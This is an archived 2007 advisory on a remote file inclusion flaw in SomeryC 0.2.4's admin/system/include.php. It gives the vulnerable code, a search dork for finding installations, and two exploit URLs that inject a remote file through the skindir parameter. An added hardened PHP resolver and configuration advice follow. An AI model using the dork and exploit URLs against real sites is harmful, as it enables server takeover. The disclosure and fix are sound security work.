SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability

2007-08-27 00:00:00

### SomeryC <= v0.2.4 Remote File Include ###

#Vendor: http://someryc.mostpopularcomic.com
#download http://someryc.mostpopularcomic.com/sC024.zip

#found by: Katatafish ([email protected])

#d0rk: "powered by someryc"

#vuln-code(/admin/system/include.php):

if ($start) {
....
include("$skindir/header.php");
}
....
include("$skindir/footer.php");

#exploit:

http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]
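
A hardened form of the skin lookup, as an added example (not SomeryC code and not from the advisory author). The include above is reachable because `$skindir` is never set by include.php itself, so with register_globals enabled a request parameter fills it. The function name `resolve_skindir()`, the `$skinsRoot` location and the skin name `default` are assumptions made for illustration.

```php
<?php
// Added example, not SomeryC code. resolve_skindir(), $skinsRoot and the
// "default" skin are hypothetical names chosen for this illustration.

/**
 * Map a requested skin name to a real directory below $skinsRoot.
 * Anything that is not a bare directory name falls back to $fallback.
 */
function resolve_skindir(string $requested, string $skinsRoot, string $fallback = 'default'): string
{
    // A bare name only: no scheme, slash, dot or NUL byte can pass this pattern.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        $requested = $fallback;
    }
    $root = realpath($skinsRoot);
    $dir  = ($root === false) ? false : realpath($root . DIRECTORY_SEPARATOR . $requested);
    // realpath() resolves symlinks, so the result must still sit under the
    // skins root and must contain both templates that include.php loads.
    if ($dir === false
        || strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0
        || !is_file("$dir/header.php")
        || !is_file("$dir/footer.php")) {
        throw new RuntimeException('skin directory not available');
    }
    return $dir;
}

// Constructed demo data: a temporary skins tree with one skin.
$skinsRoot = sys_get_temp_dir() . '/skins_demo_' . getmypid();
@mkdir("$skinsRoot/default", 0700, true);
file_put_contents("$skinsRoot/default/header.php", "<!-- header -->\n");
file_put_contents("$skinsRoot/default/footer.php", "<!-- footer -->\n");

// Constructed inputs: one valid name and three that the pattern rejects.
foreach (['default', 'http://example.invalid/x', '../../etc', "default\0"] as $input) {
    $skindir = resolve_skindir($input, $skinsRoot);
    echo json_encode($input), ' => ', basename($skindir), "\n";
}

// In include.php the resolved path would replace the raw variable:
//   $skindir = resolve_skindir($configuredSkin, $skinsRoot);
//   include "$skindir/header.php";
```

The skin name is best read from server-side configuration rather than from the request. Keeping `register_globals` and `allow_url_include` off in php.ini closes the remote variant even where the code is left unchanged.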

#

Fixes

No fixes
